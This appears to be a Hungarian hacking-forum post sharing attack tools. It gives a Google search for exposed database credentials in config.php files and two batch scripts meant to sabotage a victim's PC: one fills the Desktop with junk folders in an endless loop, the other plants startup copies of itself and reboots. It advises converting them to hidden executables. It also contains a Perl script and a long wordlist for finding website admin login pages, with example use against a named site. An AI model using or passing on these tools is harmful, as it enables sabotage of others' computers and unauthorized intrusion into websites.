Elöször is egy két finomság tőlem:
egy nagyon jó google keresés:
inurl:config.php dbuname dbpass
még több google hack keresés:
Google Hack Database:
http://www.hackersforcharity.org/ghdb/
egy kis batch(.bat) szivatás(számszerint 2 :D ):
@echo off
:S
cd %userprofile%\Desktop
SET ez=%random%
MKDIR %ez%
echo %random%%random%%random%%random%%random%%random%>%ez%.txt
goto sa második (az illető nem tudja majd használni a gépét....):
@echo off
cd %userprofile%\Start Menu\Programs\Startup
echo start "" %0>>1.bat
echo start "" %0>>1.bat
echo start "" %0>>1.bat
echo start "" %0>>1.bat
echo start "" %0>>1.bat
echo start "" %0>>1.bat
echo start "" %0>>1.bat
echo start "" %0>>1.bat
shutdown /r /t 0ezeket át tudod konvertálni .exe fájlba:
http://www.brothersoft.com/bat-to-exe-converter-download-50301.htmlvagy a google-on:
http://www.google.hu/#hl=hu&source=hp&q=bat+to+exe+converter+download&meta=&aq=0&aqi=g1&aql=&oq=bat+to+exe+converter&
gs_rfai=&fp=253f0b66ec1b01f1a konvertálás arra jó hogy belehet állitani hogy az alkalmazás invisible legyen(vagyis a háttérben fusson...)
egy megjegyzés: .bat-ba ugy tudod menteni ha bemásolod egy txt-be majd fájl->mentés másként->és kiválasztod a listán h minden fájl és a fájl neve után beirod h .bat ennyi... :D
még 1 PERL kód tőlem:
(megtalálja egy weboldalon az admin bejelentkezőt)
#!/usr/local/bin/perl
require HTTP::Request;
use HTTP::Response;
use LWP::UserAgent;
if ($ARGV[0] eq ""){
print<<EOF;
***********************************************
WebPage Admin Finder By
Faust
***********************************************
Usage: $0 hostname savefile.txt
hostname: for example(http://google.hu):google.hu (less http://)
the exploit save the worked link into the file something you type in(now the file is savefile.txt)
EOF
exit(-1);
}
if ($ARGV[1] eq ""){
print<<EOF;
***********************************************
WebPage Admin Finder By
Faust
***********************************************
Usage: $0 hostname savefile.txt
hostname: for example(http://google.hu):google.hu (less http://)
the exploit save the worked link into the file something you type in(now the file is savefile.txt)
EOF
exit(-1);
}
open(FILE, "admin.txt");
open(FILE2, ">>".$ARGV[1]);
while(<FILE>){
$host="http://$ARGV[0]/$_";
$request = HTTP::Request->new(GET => ''.$host);
$ua = LWP::UserAgent->new;
$response = $ua->request($request);
print "HTTP status at $host: ", $response->code( ), "\n";
if ($response->code( )==200){
print FILE2 "$host\n";
}
}
print "The WORKS links are saved in the $ARGV[1] !";ami még kell mellé(mentsd admin.txt-be ezt):
e107_admin/
admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
adm/
admin/
siteadmin/
administration/
adminpanel/
surveys/admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/persze ezt lehet böviteni még
nah a progirol annyit hogy beirod ugye igy:
perl af.pl a weblap neve a http:// nélkül ahovamented a jo linkeket.txt
pl.:
perl af.pl killabeats.hu ajolinkek.txt
megjegyzés: a perl progik futtatásához töltsd le és tedd fel ezt: ActivePerl
